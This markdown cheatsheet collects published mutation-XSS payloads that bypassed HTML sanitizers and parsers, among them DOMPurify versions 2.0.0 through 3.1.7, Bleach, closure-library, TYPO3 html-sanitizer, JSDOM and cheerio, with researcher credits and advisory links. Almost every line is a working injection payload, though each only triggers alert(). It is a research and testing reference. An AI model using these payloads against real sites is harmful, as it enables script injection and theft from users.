# Mutation XSS - Cheatsheet > based on https://github.com/SonarSource/mxss-cheatsheet/blob/master/examples.md --- This page contains some examples of payloads used to bypass sanitizers in the past. There are many other examples but to avoid redundancy we will add only ones that include new vectors or techniques. ## Parser Discrepancy | Parser | Payload | Credit | Additional links | |--------|---------------------------------------------------------------------------------------------------------------------------------- |----------------------------------------------------|------------------| | parser5 / htmlparse2 | `<noframes>\n<style><x \n</noframes>\n<noframes x="</style><p>">\n\n</p><style>\n\n</noframes><style>"></noframes>\n<script></script></style>` | Icesfont [@icesfont](https://twitter.com/icesfont2) | | | parser5 / htmlparse2 | `<xmp><x id=' </xmp>'><x></x><!-- test</xmp><script src='?html=<!--%0aalert(1)//'></script> <xmp> --> </xmp>` | BitK [@BitK_](https://twitter.com/BitK_) | | | parser5 / htmlparse2 | `<noembed><textarea></noembed><textarea></textarea><plaintext></noembed><!><script src="/"><!></script>` | Ark [@Ark](https://twitter.com/arkark_) | | | JSDOM | `<math><annotation-xml encoding="text/html"><x><svg><mtext><textarea><a is="</textarea><img src onerror=alert(origin)>` | Jorian Wolter [@Jorian](https://twitter.com/J0R1AN) | <https://jorianwoltjer.com/blog/p/hacking/mutation-xss> | | JSDOM | `<form><math><mtext></form><form><mglyph><svg><mtext><title><path is="</title><img src onerror=alert(origin)>">` | zakaria ounissi [@zakaria_ounissi](https://twitter.com/zakaria_ounissi) | <https://jorianwoltjer.com/blog/p/hacking/mutation-xss> | | DOMParser | `<svg></p><style><g/title="</style><img/i/src/a/onerror=alert(origin)>test</details>">` | maitai [@maitai](https://twitter.com/MaitaiThe) | <https://blig.one/2024/11/29/flatt-xss-writeup.htmls> | | DOMParser | `<!--<a+id="</title>--><img/baba/onerror="alert(origin)"/autofocus/src=x>` | frevadiscor [@frevadiscor](https://twitter.com/frevadiscor89) | | | cheerio | `<math><mtext><table><mglyph><style><img/src=x onerror="alert()">` | Game0v3r [@Game0v3r](https://twitter.com/kabilan1290) | <https://game0v3r.vercel.app/blog/wwctf-saas-challenge-writeup> | ## DomPurify | Version | Payload | Credit | Additional links | |---------|---------------------------------------------------------------------------------------------------------------------------------- |----------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------| | 2.0.0 | `<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">` | Michał Bentkowski [@SecurityMB](https://twitter.com/SecurityMB) | <https://research.securitum.com/dompurify-bypass-using-mxss/> | | 2.0.17 | `<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>` | Michał Bentkowski [@SecurityMB](https://twitter.com/SecurityMB) | <https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/> | | 2.0.17 | `<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;/mglyph&gt;&lt;img&Tab;src=1&Tab;onerror=alert(1)&gt;">` | Gareth Heyes [@garethheyes](https://twitter.com/garethheyes) | <https://portswigger.net/research/bypassing-dompurify-again-with-mutation-xss> | | 2.0.17 | `<math><mtext><table><mglyph><style><math><table id=”</table>”><img src onerror=alert(1)”>` | [@sqrtrev](https://twitter.com/sqrtrev) [@0xParrot](https://twitter.com/sqrtrev) @web_payload team [@GuesserSuper](https://twitter.com/GuesserSuper) | <https://twitter.com/0xsapra/status/1307929537749999616?ref_src=twsrc%5Etfw> | | 2.2.0 | `<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">` | Daniel Santos [@bananabr](https://twitter.com/bananabr) | <https://vovohelo.medium.com/from-svg-and-back-yet-another-mutation-xss-via-namespace-confusion-for-dompurify-2-2-2-bypass-5d9ae8b1878f> | | 2.2.3 | `<svg><xss><desc><noscript>&lt;/noscript>&lt;/desc>&lt;p>&lt;/p>&lt;style>&lt;a title="&lt;/style>&lt;img src onerror=alert(1)>">` | Michał Bentkowski [@SecurityMB](https://twitter.com/SecurityMB) | <https://twitter.com/SecurityMB/status/1341290687963262978> | | 3.0.8 | `<svg><annotation-xml><foreignobject><style><!--</style><p id="--><img src='x' onerror='alert(1)'>">` | Kévin - Mizu [@kevin_mizu](https://twitter.com/kevin_mizu) | <https://mizu.re/post/playing-with-dompurify-ce-handling> | | 3.1.0 | ```n = 506; var payload = `${"<div>".repeat(n)}<table id="outer"><caption id="outer"><svg><desc><table id="inner"><caption id="inner"></caption></table></desc><style><a title="</style><img src onerror=alert(1)>"></a></style></svg></caption></table>${"</div>".repeat(n)}`;``` | [icesfont](https://github.com/icesfont) | N/A | | 3.1.1| `<div*200><form><input name="parentNode"><div*200><form></form><form><input name="parentNode"><div*105><table> <caption> <svg> <desc> <table><caption></caption></table> </desc> <style><a title="</svg></style><img src onerror=alert(1)>"></a></style> </svg> </caption></table>` |Kévin - Mizu [@kevin_mizu](https://twitter.com/kevin_mizu) |<https://mizu.re/post/exploring-the-dompurify-library-bypasses-and-fixes#:~:text=mXSS)%20possible%3F%22%20section.-,Proof%20Of%20Concept,-For%20the%20same> | | 3.1.2 | `<form id="x "><r*504><a> <svg> <image> <a> <desc> <svg> <image></image> </svg> </desc> </a> </image> <style><a id="</style><img src=x onerror=alert(1)>"></a></style> </svg></a></form><input form="x" name="__depth">` |Kévin - Mizu [@kevin_mizu](https://twitter.com/kevin_mizu) | |<https://mizu.re/post/exploring-the-dompurify-library-bypasses-and-fixes> | | 3.1.7 | `<svg><a><foreignobject><a><table><a></table><style><!--</style></svg><a id="-><img src onerror=alert(1)>">` | Masato Kinugawa [@kinugawamasato](https://twitter.com/kinugawamasato) | <https://x.com/kinugawamasato/status/1843687909431582830> | ## Mozilla Bleach | Version | Payload | Credit | Additional links | |---------|---------------------------------------------------------------------------------|---------------------|---------------------------------------------------------------------------| | 3.1.0 | `<noscript><style></noscript><img src=x onerror=alert(1)>` | Yaniv Nizry [@YNizry](https://twitter.com/YNizry) | <https://checkmarx.com/blog/vulnerabilities-discovered-in-mozilla-bleach/> | | 3.1.1 | `<svg><style><img src=x onerror=alert(1)>` | Yaniv Nizry [@YNizry](https://twitter.com/YNizry) | <https://checkmarx.com/blog/vulnerabilities-discovered-in-mozilla-bleach/> | | 3.2.3 | `<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>` | Yaniv Nizry [@YNizry](https://twitter.com/YNizry) | <https://github.com/mozilla/bleach/security/advisories/GHSA-vv2x-vrpj-qqpq> | ## Google closure-library | Version | Payload | Credit | Additional links | |---------|------------------------------------------------------------------------------|---------------------|---------------------------------------------------------------------------| | v20190215 | `<noscript><p title="</noscript><img src=x onerror=alert(1)>">` | Masato Kinugawa [@kinugawamasato](https://twitter.com/kinugawamasato) | <https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffa> <https://www.youtube.com/watch?v=lG7U3fuNw3A> | ## Typo3 html-sanitizer | Version | Payload | Credit | Additional links | |---------|------------------------------------------------------------------------------|---------------------|---------------------------------------------------------------------------| | 2.0.15 | `<!--a foo=--!><img src=x onerror=alert(1)><!--<a>">` | David Klein [@ncd_leeN](https://twitter.com/ncd_leeN) | [CVE-2022-36020](https://github.com/TYPO3/html-sanitizer/security/advisories/GHSA-47m6-46mj-p235) | | 2.0.16 | `<![CDATA[<math><img src=x onerror=alert(1)>]]>` | David Klein [@ncd_leeN](https://twitter.com/ncd_leeN) | [CVE-2022-23499](https://github.com/TYPO3/html-sanitizer/security/advisories/GHSA-hvwx-qh2h-xcfj) |